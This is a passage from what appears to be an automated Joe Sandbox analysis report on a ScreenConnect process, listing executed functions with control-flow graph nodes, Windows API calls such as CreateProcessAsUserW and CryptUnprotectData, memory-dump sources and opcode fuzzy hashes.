41386 b34c90 41385->41386 41387 b34cc6 41386->41387 41388 b34d1d RtlGetVersion 41386->41388 41387->41378 41389 b34dda 41388->41389 41389->41378

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 00B34C62 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 111COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 130 b34c62-b34cb3 135 b34d02-b34d08 130->135 136 b34cb5-b34cc4 call b34848 130->136 139 b34cc6-b34ccb 136->139 140 b34d09-b34dd8 RtlGetVersion 136->140 152 b34cce call b352f8 139->152 153 b34cce call b352e8 139->153 145 b34de1-b34e24 140->145 146 b34dda-b34de0 140->146 141 b34cd4 141->135 150 b34e26 145->150 151 b34e2b-b34e32 145->151 146->145 150->151 152->141 153->141
                                                                                                                                                                      APIs
                                                                                                                                                                      • RtlGetVersion.NTDLL(0000009C), ref: 00B34DBE
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.3574769399.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_b30000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Version
                                                                                                                                                                      • String ID: `Q^q$`Q^q
                                                                                                                                                                      • API String ID: 1889659487-4048626156
                                                                                                                                                                      • Opcode ID: 87182859f5cd84ab44af8454cad62cf53085b0fdd267976faa5ae59e3fb744ab
                                                                                                                                                                      • Instruction ID: f5f23dba3d152bf807e2309d29cffcfa7813497266557f35598c2e648b4ed912
                                                                                                                                                                      • Opcode Fuzzy Hash: 87182859f5cd84ab44af8454cad62cf53085b0fdd267976faa5ae59e3fb744ab
                                                                                                                                                                      • Instruction Fuzzy Hash: 0341BF71E003599FDB20DF68C848BADBBB5FB45310F1085E9D5499B280DB745E4ACF92
                                                                                                                                                                      Function 05222930 Relevance: 1.6, APIs: 1, Instructions: 93processCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 524 5222930-5222981 525 5222983-5222989 524->525 526 522298c-5222990 524->526 525->526 527 5222992-5222995 526->527 528 5222998-52229ad 526->528 527->528 529 52229bb-5222a12 CreateProcessAsUserW 528->529 530 52229af-52229b8 528->530 531 5222a14-5222a1a 529->531 532 5222a1b-5222a43 529->532 530->529 531->532
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 052229FF
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.3601950400.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5220000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateProcessUser
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2217836671-0
                                                                                                                                                                      • Opcode ID: aefdc15c69ab550f503a2ce0e1393b5473ecced67d6461363b9325092b1599ed
                                                                                                                                                                      • Instruction ID: 6b5d4c6efc52a47cecec681c5697ce9dfb1767978854458f25c13346ab20d0b9
                                                                                                                                                                      • Opcode Fuzzy Hash: aefdc15c69ab550f503a2ce0e1393b5473ecced67d6461363b9325092b1599ed
                                                                                                                                                                      • Instruction Fuzzy Hash: B541357690021AEFCF10CFA9C884ADEBBF1FF48310F14842AE958A7250D735A955CF90
                                                                                                                                                                      Function 03991730 Relevance: 1.6, APIs: 1, Instructions: 65encryptionCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CryptProtectData.CRYPT32(?,00000000,?,?,?,?,?), ref: 039917AE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.3593478696.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CryptDataProtect
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3091777813-0
                                                                                                                                                                      • Opcode ID: b79e3982a3ced31369e497477a81969b93c0bd3e0d48d5775a70b6c7f42e0aea
                                                                                                                                                                      • Instruction ID: d3aa157166d95765dafc822d63ba48fe13d89ce0ef2b2d77b5c0a2a6599ab697
                                                                                                                                                                      • Opcode Fuzzy Hash: b79e3982a3ced31369e497477a81969b93c0bd3e0d48d5775a70b6c7f42e0aea
                                                                                                                                                                      • Instruction Fuzzy Hash: F02145B680024ADFDF10CF9AC844ADEBBF5FF88350F14851AE958A7210D339A552CFA0
                                                                                                                                                                      Function 03991738 Relevance: 1.6, APIs: 1, Instructions: 61encryptionCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CryptProtectData.CRYPT32(?,00000000,?,?,?,?,?), ref: 039917AE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.3593478696.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CryptDataProtect
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3091777813-0
                                                                                                                                                                      • Opcode ID: 3eb0b0ee3c54f75add11968ac3e5ccd8839b58f6ea3ddd314d8334061db995b2
                                                                                                                                                                      • Instruction ID: d8f67fad18ada47c8c2017838254bcdd5a5285f249e95be7542673510ae9f449
                                                                                                                                                                      • Opcode Fuzzy Hash: 3eb0b0ee3c54f75add11968ac3e5ccd8839b58f6ea3ddd314d8334061db995b2
                                                                                                                                                                      • Instruction Fuzzy Hash: BE2104B680024A9FDF10CF9AC844ADEBBF5FB88350F14842AE959A7210D739A555CFA1
                                                                                                                                                                      Function 05211504 Relevance: 1.6, APIs: 1, Instructions: 57encryptionCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 0521300D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.3601775033.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5210000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CryptDataUnprotect
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 834300711-0
                                                                                                                                                                      • Opcode ID: 1b98d0dd9cc6f2345a12d319db2bcf6903d8953a1dff7e81b81e307fb62395ae
                                                                                                                                                                      • Instruction ID: de9261be9005e04daa7b30ceb843470b12bff896ef14deb1f168729323a25e3a
                                                                                                                                                                      • Opcode Fuzzy Hash: 1b98d0dd9cc6f2345a12d319db2bcf6903d8953a1dff7e81b81e307fb62395ae
                                                                                                                                                                      • Instruction Fuzzy Hash: E82144B6800249DFCF10CF99C804AEEBBF5EF48320F108419E914A7250C379A551CFA4
                                                                                                                                                                      Function 05212FA0 Relevance: 1.6, APIs: 1, Instructions: 57encryptionCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 0521300D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.3601775033.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5210000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CryptDataUnprotect
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 834300711-0
                                                                                                                                                                      • Opcode ID: a25f92980159a47163da87c525fed03f689bfbdd2747fc89b1a0ebd1a30f3f07
                                                                                                                                                                      • Instruction ID: ae2ecc058ccfa8b46a1c209ec1f81955c8e3c519f1587faf6c1a5e55fb4dabd4
                                                                                                                                                                      • Opcode Fuzzy Hash: a25f92980159a47163da87c525fed03f689bfbdd2747fc89b1a0ebd1a30f3f07
                                                                                                                                                                      • Instruction Fuzzy Hash: 4B2153B280020A9FCF10CF99C844BEEBFF5EF48320F148419E918A7210C339A595CFA4
                                                                                                                                                                      Function 05220040 Relevance: .6, Instructions: 567COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.3601950400.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5220000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 9ce992a1fd756fd8c69ed1865b181a1fef8eaff881708a8ef793d7c8cad1d3e6
                                                                                                                                                                      • Instruction ID: e50fc3ba61ee286473bbfb9a0e14e666a0d07a67dae025e5e76ec01ae8ebd7cd
                                                                                                                                                                      • Opcode Fuzzy Hash: 9ce992a1fd756fd8c69ed1865b181a1fef8eaff881708a8ef793d7c8cad1d3e6
                                                                                                                                                                      • Instruction Fuzzy Hash: 5D324C34A402199FDB54DF68D994A9DBBF2FF88304F1085A9E50AAB355DB70ED81CF80
                                                                                                                                                                      Function 0522F696 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 119fileCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 154 522f696-522f69d 155 522f69f-522f6bb 154->155 156 522f6bd-522f6fc 154->156 155->156 157 522f750-522f7d3 CreateFileA 156->157 158 522f6fe-522f723 156->158 165 522f7d5-522f7db 157->165 166 522f7dc-522f81a 157->166 158->157 161 522f725-522f727 158->161 163 522f74a-522f74d 161->163 164 522f729-522f733 161->164 163->157 167 522f737-522f746 164->167 168 522f735 164->168 165->166 173 522f82a 166->173 174 522f81c-522f820 166->174 167->167 169 522f748 167->169 168->167 169->163 176 522f82b 173->176 174->173 175 522f822 174->175 175->173 176->176
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileA.KERNEL32(?,?,?,?,?,00000001,00000004), ref: 0522F7BD
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.3601950400.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5220000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                      • String ID: 4L^q
                                                                                                                                                                      • API String ID: 823142352-616035646
                                                                                                                                                                      • Opcode ID: 2ec95cd999efded5f3c562c4ba49f341348ffc50ee793609e47b84c75f2d2a08
                                                                                                                                                                      • Instruction ID: f40e220f5b47c53b18006b38b3e4785dc74a192bdd4b95981f3db996591d1daf
                                                                                                                                                                      • Opcode Fuzzy Hash: 2ec95cd999efded5f3c562c4ba49f341348ffc50ee793609e47b84c75f2d2a08
                                                                                                                                                                      • Instruction Fuzzy Hash: 215188B5D10259AFDB10CFA9CA85B9EBBF2FF08300F248129E809AB351D7759845CF81
                                                                                                                                                                      Function 0522F6A0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 116fileCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 177 522f6a0-522f6fc 178 522f750-522f7d3 CreateFileA 177->178 179 522f6fe-522f723 177->179 186 522f7d5-522f7db 178->186 187 522f7dc-522f81a 178->187 179->178 182 522f725-522f727 179->182 184 522f74a-522f74d 182->184 185 522f729-522f733 182->185 184->178 188 522f737-522f746 185->188 189 522f735 185->189 186->187 194 522f82a 187->194 195 522f81c-522f820 187->195 188->188 190 522f748 188->190 189->188 190->184 197 522f82b 194->197 195->194 196 522f822 195->196 196->194 197->197
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileA.KERNEL32(?,?,?,?,?,00000001,00000004), ref: 0522F7BD
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.3601950400.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5220000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                      • String ID: 4L^q
                                                                                                                                                                      • API String ID: 823142352-616035646
                                                                                                                                                                      • Opcode ID: daefd029d773af43e48bfb32158bb06befbd1b65945c93087a7a8e9e127b85d5
                                                                                                                                                                      • Instruction ID: 54b4f4ca92d5e558910c43b4d97e82000ad57bb7a705a4d48fddc1c1f0c565dd
                                                                                                                                                                      • Opcode Fuzzy Hash: daefd029d773af43e48bfb32158bb06befbd1b65945c93087a7a8e9e127b85d5
                                                                                                                                                                      • Instruction Fuzzy Hash: EE4177B5D10259AFDB10CFA9CA45B9EBBF2FF48304F248129E808AB351D7B59845CF81
                                                                                                                                                                      Function 052162E8 Relevance: 1.7, APIs: 1, Instructions: 176COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 479 52162e8-52162fd 480 5216312-5216319 479->480 481 52162ff-5216302 479->481 484 521631e-5216362 call 5215594 480->484 482 5216308-5216311 481->482 483 52163cc-52163e0 481->483 485 52163e2 483->485 486 52163a6-52163af 483->486 503 5216367-521636c 484->503 490 52163ee-52163f7 485->490 488 52163b1-52163cb 486->488 489 521640c-521646e 486->489 494 5216470-5216478 489->494 495 521647a-52164b0 K32EnumProcesses 489->495 494->495 497 52164b2-52164b8 495->497 498 52164b9-52164e1 495->498 497->498 504 5216372-5216375 503->504 505 52163f8-5216405 503->505 506 52163e4-52163e9 504->506 507 5216377-52163a4 504->507 505->489 506->484 507->486 507->490
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.3601775033.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5210000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 2e05e494c9b9ef7e191874319e867317809954d3d937dfdc48bc902766c25d9c
                                                                                                                                                                      • Instruction ID: 28886f3bdaa51dc2ff371f9302023e2b6a442fdb60aeb6c1431cfde9c75a4ca3
                                                                                                                                                                      • Opcode Fuzzy Hash: 2e05e494c9b9ef7e191874319e867317809954d3d937dfdc48bc902766c25d9c
                                                                                                                                                                      • Instruction Fuzzy Hash: 13518C71A006058FCB24CFA9D884AAFBBF5FF88310F10892ED45AD7A51D734E9458BA5
                                                                                                                                                                      Function 05222928 Relevance: 1.6, APIs: 1, Instructions: 95processCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 512 5222928-5222981 514 5222983-5222989 512->514 515 522298c-5222990 512->515 514->515 516 5222992-5222995 515->516 517 5222998-52229ad 515->517 516->517 518 52229bb-5222a12 CreateProcessAsUserW 517->518 519 52229af-52229b8 517->519 520 5222a14-5222a1a 518->520 521 5222a1b-5222a43 518->521 519->518 520->521
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 052229FF
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.3601950400.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5220000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateProcessUser
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2217836671-0
                                                                                                                                                                      • Opcode ID: 34c32df232b55f49f2bba55e43fc26e4855aab913d10ac7be86b901552334622
                                                                                                                                                                      • Instruction ID: 59091a945375d1f358529fa4c6fb3a3dceae6dbcb2b3e6319c09c7cb5b10287b
                                                                                                                                                                      • Opcode Fuzzy Hash: 34c32df232b55f49f2bba55e43fc26e4855aab913d10ac7be86b901552334622
                                                                                                                                                                      • Instruction Fuzzy Hash: 6441247690025AEFCB10CFA9C884ADEBBF1FF48310F14842AE958A7250D775AA55CF90
                                                                                                                                                                      Function 052214D5 Relevance: 1.6, APIs: 1, Instructions: 69pipeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ConnectNamedPipe.KERNEL32(00000000), ref: 05221558
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.3601950400.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5220000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ConnectNamedPipe
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2191148154-0
                                                                                                                                                                      • Opcode ID: 4e51904564f442cac0bad3090664511601a89dc6f6c3f3615e40ddd7a52d47ac
                                                                                                                                                                      • Instruction ID: 39b9f128194c6f992e7aeeeaaaaffff1c0f02777030184f37614e24c161a6994
                                                                                                                                                                      • Opcode Fuzzy Hash: 4e51904564f442cac0bad3090664511601a89dc6f6c3f3615e40ddd7a52d47ac
                                                                                                                                                                      • Instruction Fuzzy Hash: 692124B5D10268AFCB24CFA9D584BDEBBF0AF48310F148069E859AB350DB749956CF90
                                                                                                                                                                      Function 052164F0 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 535 52164f0-521651b 536 5216520-5216591 ProcessIdToSessionId 535->536 537 5216593-5216599 536->537 538 521659a-52165c2 536->538 537->538
                                                                                                                                                                      APIs
                                                                                                                                                                      • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 0521657E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.3601775033.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5210000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ProcessSession
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3779259828-0
                                                                                                                                                                      • Opcode ID: e224754b3bb1e9d01beb4063d6b6cf97a8974d371b3db8ea4b4c31eae1888584
                                                                                                                                                                      • Instruction ID: dc8a8eed12692888fbfc78c178a3fe1b533296aebe09d7791ac109550e535675
                                                                                                                                                                      • Opcode Fuzzy Hash: e224754b3bb1e9d01beb4063d6b6cf97a8974d371b3db8ea4b4c31eae1888584
                                                                                                                                                                      • Instruction Fuzzy Hash: 9B2152B28002499FCB10CF9AC885BDEBBF4FF49324F15806AD858A7651D338A945CFA5
                                                                                                                                                                      Function 052214E0 Relevance: 1.6, APIs: 1, Instructions: 65pipeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ConnectNamedPipe.KERNEL32(00000000), ref: 05221558
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.3601950400.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5220000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ConnectNamedPipe
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2191148154-0
                                                                                                                                                                      • Opcode ID: 5839c76949ad946369ab64a6ba73e3fa67bd49399f303e9f15554964c2537f7b
                                                                                                                                                                      • Instruction ID: d94d5488095a9ff3f7ce2cbd214ca6e835c6f75e06dd5bf7f018aa5c4c470528
                                                                                                                                                                      • Opcode Fuzzy Hash: 5839c76949ad946369ab64a6ba73e3fa67bd49399f303e9f15554964c2537f7b
                                                                                                                                                                      • Instruction Fuzzy Hash: 862117B4D102589FCB24CF99C584BDEBBF5AF48300F148059E849A7350CB749945CF94
                                                                                                                                                                      Function 05215594 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • K32EnumProcesses.KERNEL32(00000000,00000000,?), ref: 0521649D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.3601775033.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5210000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: EnumProcesses
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 84517404-0
                                                                                                                                                                      • Opcode ID: d50feacc9bf21c0bdc61691947479c1072e1e7fdcb859578e7f3ac492fc56ec1
                                                                                                                                                                      • Instruction ID: eef8dbd8927c4a7ad6319e0cdfc0b542a0536c35d7fceb997717f22c53d55b8f
                                                                                                                                                                      • Opcode Fuzzy Hash: d50feacc9bf21c0bdc61691947479c1072e1e7fdcb859578e7f3ac492fc56ec1
                                                                                                                                                                      • Instruction Fuzzy Hash: A42128B59002199FDB20CF99C844BEEFBF4FF48310F10842DE959A7240C379A945CBA4
                                                                                                                                                                      Function 05224EE0 Relevance: 1.6, APIs: 1, Instructions: 59pipeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • WaitNamedPipeW.KERNEL32(00000000,0000000A,?,?,?,?,?,?,?,05224EA6), ref: 05224F4F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.3601950400.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5220000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: NamedPipeWait
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3146367894-0
                                                                                                                                                                      • Opcode ID: a8cb13b072504cd4b74c6ee01c33c6783b19a8581feca51a84011c5087be98e3
                                                                                                                                                                      • Instruction ID: d099e60d6a8194e2537a028c4500407518c99b267c30a31276a923a67c45b1cb
                                                                                                                                                                      • Opcode Fuzzy Hash: a8cb13b072504cd4b74c6ee01c33c6783b19a8581feca51a84011c5087be98e3
                                                                                                                                                                      • Instruction Fuzzy Hash: 532135B68142599FCB10CF9AC444AEEBBF4EB88314F11842ED469A7240C779A545CFA1
                                                                                                                                                                      Function 0522387C Relevance: 1.6, APIs: 1, Instructions: 59pipeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • WaitNamedPipeW.KERNEL32(00000000,0000000A,?,?,?,?,?,?,?,05224EA6), ref: 05224F4F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.3601950400.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5220000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: NamedPipeWait
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3146367894-0
                                                                                                                                                                      • Opcode ID: 1e7bd42d6687253dd83b8958644ffa7c44988a93ee130a8e1e4548f3d9391797
                                                                                                                                                                      • Instruction ID: 4b27d8f36d31771ca29a677b95b30f70344870d6ea91c7fa8ea4dcf1a359a095
                                                                                                                                                                      • Opcode Fuzzy Hash: 1e7bd42d6687253dd83b8958644ffa7c44988a93ee130a8e1e4548f3d9391797
                                                                                                                                                                      • Instruction Fuzzy Hash: 9F2135B68143599FCB10DF9AC444AEEBBF4EF88324F10842EE469A7201C379A545CFA0
                                                                                                                                                                      Function 05215588 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 0521657E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.3601775033.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5210000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ProcessSession
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3779259828-0
                                                                                                                                                                      • Opcode ID: aa3da5983441353f29e19d9af0186120d7ec6b4b06073996741998114a491d2a
                                                                                                                                                                      • Instruction ID: fe1e32cc1579ab6b05d271621820e09b2eabb42b3aa75d816df4e7b20b449063
                                                                                                                                                                      • Opcode Fuzzy Hash: aa3da5983441353f29e19d9af0186120d7ec6b4b06073996741998114a491d2a
                                                                                                                                                                      • Instruction Fuzzy Hash: 9A1100B18103499FCB20CF9AC444BEEBBF4FB48324F10846AE859A7650D379A945CFA5
                                                                                                                                                                      Function 00ADD670 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.3574186429.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_add000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 76d2d360ad32e0cbf0051c41b9d4581221c088c4b7b005b2a3f86c47e6237ab6
                                                                                                                                                                      • Instruction ID: e937048dda6fc01232d6ac17fffd0fbf4f4be9341c3a5822457424661754f3f1
                                                                                                                                                                      • Opcode Fuzzy Hash: 76d2d360ad32e0cbf0051c41b9d4581221c088c4b7b005b2a3f86c47e6237ab6
                                                                                                                                                                      • Instruction Fuzzy Hash: 312122B2544240DFCB05DF14D9C0B2BBF75FB98320F20C5AAE80A0B356C336D856CAA1
                                                                                                                                                                      Function 00ADD66B Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.3574186429.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_add000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                      • Instruction ID: e5b419e13e207e77600cae9e020e8daeca29628742b1965174a9db5fb00686db
                                                                                                                                                                      • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                      • Instruction Fuzzy Hash: 0F11D376504280CFCB16CF10D9C4B16BF72FB98324F24C6AAD8090B756C336D85ACBA1
                                                                                                                                                                      Function 00ADD01D Relevance: .0, Instructions: 45COMMON
